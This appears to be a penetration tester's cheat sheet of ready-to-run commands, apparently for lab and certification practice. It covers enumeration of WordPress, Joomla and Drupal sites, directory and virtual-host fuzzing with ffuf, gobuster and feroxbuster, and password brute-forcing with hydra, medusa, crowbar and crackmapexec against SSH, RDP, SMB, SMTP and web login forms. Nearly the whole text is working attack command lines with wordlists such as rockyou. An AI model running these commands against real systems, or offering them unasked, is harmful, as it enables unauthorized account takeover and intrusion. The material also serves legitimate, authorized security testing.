WordPress


wpscan --url http://10.10.10.10 -e vp,vt,cb,dbe,u1-10 --no-banner --no-update --random-agent
wpscan --url http://10.10.10.10 --no-banner --no-update --enumerate u --detection-mode aggressive --api-token xxxxx
wpscan --url https://blogblog/ --no-banner --no-update --disable-tls-checks -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://10.11.1.116:80/ --no-banner --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee -a "wpscan.txt"

hydra -e nsr -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
wpscan --url https://blogblog/ --plugins-detection aggressive

wpscan --url http://funbox.fritz.box --disable-tls-checks -u joe -P /usr/share/wordlists/rockyou.txt
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
PASS_FILE /usr/share/wordlists/rockyou.txt

Joomla

python /opt/CMSmap/cmsmap.py http://enterprise.htb:8080 -u admin -p passwords.txt -v

msf > use auxiliary/scanner/http/joomla_bruteforce_login

joomscan -u http://10.10.10.61:8080 

nmap -p8080 --script http-joomla-brute --script-args 'userdb=names.txt,passdb=passwords.txt,http-joomla-brute.hostname=,http-joomla-brute.threads=3,brute.firstonly=true' 10.10.10.61

curl https://joomla-site/administrator/manifests/files/joomla.xml

Drupal

/opt/CMSmap/cmsmap.py http://10.11.1.50 --fullscan --nosslcheck -f D

Ffuf


Enumerate subdomains (Host header fuzzing)

ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.34.238 -fs 2395
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.34.238 -fs 2395 -s -b "PHPSESSID=gujj6thaoru7j810441kieokjj"  

Enumerate usernames

ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.221.110/customers/signup -mr "username already exists"

Brute force a login page

ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.221.110/customers/signup -mr "username already exists" -s

ffuf -w valid_usernames.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.221.110/customers/login -fc 200

Virtual host enumeration

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://forge.htb/ -H "Host: FUZZ.forge.htb" -mc 200 -fl 10
ffuf -c -w letters -u http://10.10.21.10 -H "User-Agent: FUZZ"

Directory brute force

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt:FUZZ -u https://IP/books/FUZZ -r -recursion -recursion-depth 2 -o ffuf_scan -of all -e .php,.aspx,.txt

Recursive scan

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

JSON body fuzzing

ffuf -w /usr/share/seclists/Usernames/Names/names.txt -u http://IP -X POST -H "Content-Type: application/json"  -d '{"data":"value"}' -fr "error"

Gobuster


gobuster dir -u http://192.168.53.205/config/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -eqz -x "txt,html,php,asp,aspx,jsp,sql,md,xml,yml,yaml,js"

gobuster dir -u https://10.11.1.237/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -eqz -k
gobuster dir -u http://192.168.0.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php
gobuster dir --proxy socks5://127.0.0.1:5000 -w /usr/share/xxx -k -u https://10.10.10.1 -n
gobuster vhost --url http://thetoppers.htb --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster dns --domain example.com --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Feroxbuster


feroxbuster --url http://exam.seventeen.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --silent -t 16 -r -f --smart

feroxbuster -u http://10.11.1.116:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e

Hydra brute force


Debugging Hydra: https://blog.g0tmi1k.com/dvwa/bruteforce-low/#comingsoon, https://github.com/gnebbia/hydra_notes, https://spaddex.com/post/httpbrute/

rm -f hydra.restore; export HYDRA_PROXY_HTTP=http://127.0.0.1:8080

Brute force a protocol of your choice

hydra -e nsr -P <wordlist> -v <ip> <protocol>
hydra -e nsr -t 16 -l neil -P /usr/share/wordlists/rockyou.txt -vV 10.10.129.236 ssh
hydra -e nsr -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "hydra.txt" ssh://10.11.1.116
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "medusa.txt" -M ssh -h 10.11.1.116
hydra -e nsr -t 10 -V -L users_10.11.1.20.txt -P passwords.txt rdp://10.11.1.21

hydra -S -e nsr -L generated_users.txt -P /usr/share/wordlists/fasttrack.txt -s 443 IP https-form-post '/something/login:password=^PASS^&username=^USER^:S=302'

SMTP user enumeration (VRFY)

hydra smtp-enum://192.168.186.63:25/vrfy -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" 2>&1

Brute force HTTP Basic auth (.htaccess-protected directory)

hydra -l offsec -P /usr/share/wordlists/rockyou.txt -f 192.168.24.52 http-get

Brute force SquirrelMail

hydra -l leo -P /usr/share/wordlists/rockyou.txt "http-post-form://www.insanityhosting.vm/webmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."

Brute force usernames and passwords

hydra -e nsr -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol> -vV
crackmapexec smb 172.31.3.9 -u users.txt -p users.txt --continue-on-success

medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "medusa.txt" -M http -h 10.11.1.116 -m DIR:/path/to/auth/area

medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "medusa.txt" -M web-form -h 10.11.1.116 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"

Attack a Windows Remote Desktop login with a password list

hydra -e nsr -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>

hydra -e nsr -L people.txt -P /usr/share/wordlists/rockyou.txt ssh://172.16.64.166:2222 -vV -I

hydra -e nsr -l jack -P /usr/share/wordlists/rockyou.txt 10.10.59.209 -s 2222 ssh

hydra -e nsr -l "Log+In" -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-form-post '/db/index.php:password=^PASS^&remember=yes&login=^USER^&proc_login=true:F=Incorrect password.' -vV

hydra -e nsr -l jack -p "u?WtKSraq" 10.10.59.209 http-form-post '/recovery.php:user=^USER^&pass=^PASS^&submit=Submit:F=failed' -vV

hydra -e nsr -l natalya -P /usr/share/wordlists/rockyou.txt 10.10.84.32 http-get "/sev-home/"


hydra -e nsr -L "Log+In" -p '' 192.168.196.238 https-form-post '/session_login.cgi:pass=^PASS^&user=^USER^:F=Incorrect password.' -s 10000 -vV

Password attacks against the Windows Remote Desktop Protocol (RDP)

sudo apt install crowbar
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1

Craft a more specific request for Hydra to brute force WordPress

hydra -e nsr -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

hydra -e nsr -v -V -l "[email protected]" -P "/usr/share/wordlists/rockyou.txt" -s 80 10.10.11.120 http-post-form "/api/user/login:{\"email\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:F=Password is wrong:H=Accept: application/json, text/plain, */*:H=Accept-Language: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate"

Brute force TinyFileManager: TinyFileManager ships with two default users, admin and user.

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"